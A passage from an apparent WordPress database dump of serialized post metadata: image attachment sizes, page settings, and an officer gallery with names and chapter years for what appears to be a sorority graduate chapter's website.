:20:\"amicette-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"amicette-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"amicette-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"amicette-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"amicette-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"amicette-221x300.png\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2465,562,'_edit_lock','1480863285:1'),(3420,853,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:640;s:4:\"file\";s:14:\"2017/01/DP.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"DP-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"DP-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"DP-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"DP-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:14:\"DP-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:14:\"DP-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:14:\"DP-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"DP-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"DP-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"DP-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3419,853,'_wp_attached_file','2017/01/DP.jpg'),(3417,852,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:683;s:4:\"file\";s:19:\"2016/12/Elderly.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Elderly-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Elderly-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"Elderly-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"Elderly-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:19:\"Elderly-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"Elderly-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"Elderly-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Elderly-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"Elderly-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:19:\"Elderly-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"Elderly-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3416,852,'_wp_attached_file','2016/12/Elderly.jpg'),(3435,861,'_wp_attachment_backup_sizes','a:24:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:5184;s:6:\"height\";i:3456;s:4:\"file\";s:12:\"IMG_0846.jpg\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"medium_large-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"large-orig\";a:4:{s:4:\"file\";s:21:\"IMG_0846-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"list-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"shop_thumbnail-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"shop_catalog-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"shop_single-orig\";a:4:{s:4:\"file\";s:20:\"IMG_0846-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"full-1484268423114\";a:3:{s:5:\"width\";i:3456;s:6:\"height\";i:5184;s:4:\"file\";s:27:\"IMG_0846-e1484188220763.jpg\";}s:23:\"thumbnail-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"medium-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"medium_large-1484268423114\";a:4:{s:4:\"file\";s:36:\"IMG_0846-e1484188220763-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"large-1484268423114\";a:4:{s:4:\"file\";s:36:\"IMG_0846-e1484188220763-683x1024.jpg\";s:5:\"width\";i:683;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"post-thumbnail-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"grid-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-450x300.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"list-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-680x300.jpg\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"thumb-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"shop_thumbnail-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-180x180.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"shop_catalog-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"shop_single-1484268423114\";a:4:{s:4:\"file\";s:35:\"IMG_0846-e1484188220763-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(2809,544,'_edit_lock','1480959484:1'),(3255,802,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:20:\"2014/12/rsz_dove.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"rsz_dove-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"rsz_dove-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:20:\"rsz_dove-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:20:\"rsz_dove-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:20:\"rsz_dove-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"rsz_dove-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"rsz_dove-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3254,802,'_wp_attached_file','2014/12/rsz_dove.png'),(3793,956,'post_settings','a:8:{s:8:\"subtitle\";s:0:\"\";s:10:\"hide_title\";s:2:\"no\";s:12:\"hide_related\";s:2:\"no\";s:9:\"hide_meta\";s:2:\"no\";s:19:\"hide_social_sharing\";s:2:\"no\";s:12:\"hide_featimg\";s:3:\"yes\";s:15:\"hide_author_box\";s:3:\"yes\";s:14:\"title_position\";s:5:\"below\";}'),(3792,956,'page_settings',NULL),(3791,956,'ts_header_and_footer','a:3:{s:14:\"disable_header\";i:0;s:14:\"disable_footer\";i:0;s:11:\"breadcrumbs\";i:0;}'),(4449,1180,'_wp_attached_file','2014/12/Cherice.png'),(4450,1180,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:19:\"2014/12/Cherice.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Cherice-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Cherice-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"Cherice-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"Cherice-400x300.png\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Cherice-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(4451,1181,'_wp_attached_file','2014/12/Cherice.jpg'),(4452,1181,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:400;s:6:\"height\";i:400;s:4:\"file\";s:19:\"2014/12/Cherice.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Cherice-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Cherice-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"grid\";a:4:{s:4:\"file\";s:19:\"Cherice-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:4:\"list\";a:4:{s:4:\"file\";s:19:\"Cherice-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:19:\"Cherice-180x110.jpg\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3925,984,'_edit_lock','1484672856:1'),(3926,984,'_edit_last','1'),(3927,986,'_wp_attached_file','2017/01/101616-minutes.doc'),(3773,797,'_yoast_wpseo_content_score','60'),(5194,1313,'_rawhtml_settings','0,0,0,0'),(2848,665,'_wp_attached_file','2016/12/Lillet-Williams.jpg'),(2849,665,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:160;s:6:\"height\";i:154;s:4:\"file\";s:27:\"2016/12/Lillet-Williams.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Lillet-Williams-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:27:\"Lillet-Williams-160x110.jpg\";s:5:\"width\";i:160;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(2853,667,'_wp_attached_file','2016/12/KAlawode-150x150.jpeg'),(2854,667,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:150;s:6:\"height\";i:150;s:4:\"file\";s:29:\"2016/12/KAlawode-150x150.jpeg\";s:5:\"sizes\";a:1:{s:5:\"thumb\";a:4:{s:4:\"file\";s:29:\"KAlawode-150x150-150x110.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(2861,669,'_edit_last','1'),(2860,669,'ts_template','a:0:{}'),(2862,669,'hover_effects_options','a:21:{s:5:\"style\";s:6:\"circle\";s:13:\"circle_option\";a:2:{i:1;a:4:{s:12:\"circle_image\";s:3:\"665\";s:12:\"circle_title\";s:31:\"Lillet Williams, Vice President\";s:11:\"circle_desc\";s:23:\"Chapter - Year\r\nCollege\";s:11:\"circle_link\";s:0:\"\";}i:2;a:4:{s:12:\"circle_image\";s:2:\"97\";s:12:\"circle_title\";s:26:\"Cherice Daniel, President \";s:11:\"circle_desc\";s:24:\"Chapter - Year\r\nCollege \";s:11:\"circle_link\";s:0:\"\";}}s:13:\"circle_effect\";s:7:\"effect1\";s:16:\"circle_animation\";s:13:\"left_to_right\";s:12:\"circle_color\";s:0:\"\";s:18:\"circle_image_width\";s:3:\"216\";s:19:\"circle_column_space\";s:2:\"15\";s:16:\"circle_row_space\";s:2:\"26\";s:13:\"circle_border\";b:1;s:11:\"circle_font\";a:3:{s:6:\"family\";s:9:\"Open Sans\";s:7:\"variant\";s:7:\"regular\";s:4:\"font\";s:6:\"google\";}s:24:\"circle_heading_font_size\";s:2:\"16\";s:20:\"circle_heading_color\";s:4:\"#fff\";s:21:\"circle_desc_font_size\";s:2:\"12\";s:17:\"circle_desc_color\";s:4:\"#fff\";s:15:\"circle_move_top\";s:3:\"110\";s:25:\"circle_mobile_image_width\";s:3:\"240\";s:23:\"circle_ipad_image_width\";s:3:\"300\";s:16:\"circle_underline\";b:0;s:16:\"circle_link_open\";b:0;s:15:\"circle_position\";b:0;s:17:\"circle_responsive\";b:0;}'),(2863,669,'_edit_lock','1481660066:1'),(2869,672,'ich_cpt','a:12:{i:2;a:13:{s:8:\"imageurl\";s:58:\"https://zphiblgz.org/wp-content/uploads/2016/12/Connie.png\";s:10:\"imagetitle\";s:9:\"President\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:123:\"<span style=\"font-size: 12px;\"><b><font face=\"Verdana\" color=\"#0000ff\">Cherice Daniel\r\nEta Epsilon - 1992</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:4:\"auto\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:1;a:13:{s:8:\"imageurl\";s:58:\"https://zphiblgz.org/wp-content/uploads/2016/12/Connie.png\";s:10:\"imagetitle\";s:18:\"1st Vice President\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:160:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Lillet Williams\r\nTheta Eta - 1994</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:4;a:13:{s:8:\"imageurl\";s:58:\"https://zphiblgz.org/wp-content/uploads/2016/12/Connie.png\";s:10:\"imagetitle\";s:18:\"2nd Vice President\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:159:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Diandra Eason\r\nZeta Kappa - 2000</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:5;a:13:{s:8:\"imageurl\";s:59:\"https://zphiblgz.org/wp-content/uploads/2016/12/Diandra.png\";s:10:\"imagetitle\";s:18:\"3rd Vice President\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:159:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Constance Kinder\r\nXi Iota - 1989</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:6;a:13:{s:8:\"imageurl\";s:74:\"https://zphiblgz.org/wp-content/uploads/2016/12/TCurtis-e1482288985389.jpg\";s:10:\"imagetitle\";s:9:\"Treasurer\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:163:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Tamara Curtis\r\nLambda Epsilon - 2000</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:7;a:13:{s:8:\"imageurl\";s:58:\"https://zphiblgz.org/wp-content/uploads/2016/12/Shanee.jpg\";s:10:\"imagetitle\";s:19:\"Financial Secretary\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:168:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Shanee\' Satchel\r\nLambda Gamma Zeta - 2015</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:8;a:13:{s:8:\"imageurl\";s:64:\"https://zphiblgz.org/wp-content/uploads/2016/12/KathyBarrett.jpg\";s:10:\"imagetitle\";s:19:\"Recording Secretary\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:155:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Kathy J. Barrett\r\nPhi - 1979</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:9;a:13:{s:8:\"imageurl\";s:65:\"https://zphiblgz.org/wp-content/uploads/2016/12/Christy-Lewis.jpg\";s:10:\"imagetitle\";s:23:\"Corresponding Secretary\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:160:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 255);\"><b><font face=\"Verdana\" color=\"#0000ff\">Christy Lewis\r\nAlpha Gamma - 1999</font></b></span>\";s:11:\"captionwrap\";s:3:\"div\";s:16:\"captionalignment\";s:6:\"center\";s:12:\"captioncolor\";s:7:\"#2741a6\";s:9:\"captionbg\";s:7:\"#2741a6\";s:14:\"captionoverlay\";s:4:\"full\";s:11:\"captionlink\";s:0:\"\";s:13:\"captiontarget\";s:6:\"_blank\";s:11:\"hovereffect\";s:28:\"square effect3 top_to_bottom\";s:11:\"borderstyle\";s:5:\"solid\";}i:10;a:13:{s:8:\"imageurl\";s:63:\"https://zphiblgz.org/wp-content/uploads/2016/12/dawnkempweb.jpg\";s:10:\"imagetitle\";s:15:\"Parliamentarian\";s:8:\"imagealt\";s:0:\"\";s:11:\"captiontext\";s:156:\"<span style=\"font-size: 12px; background-color: rgb(255, 255, 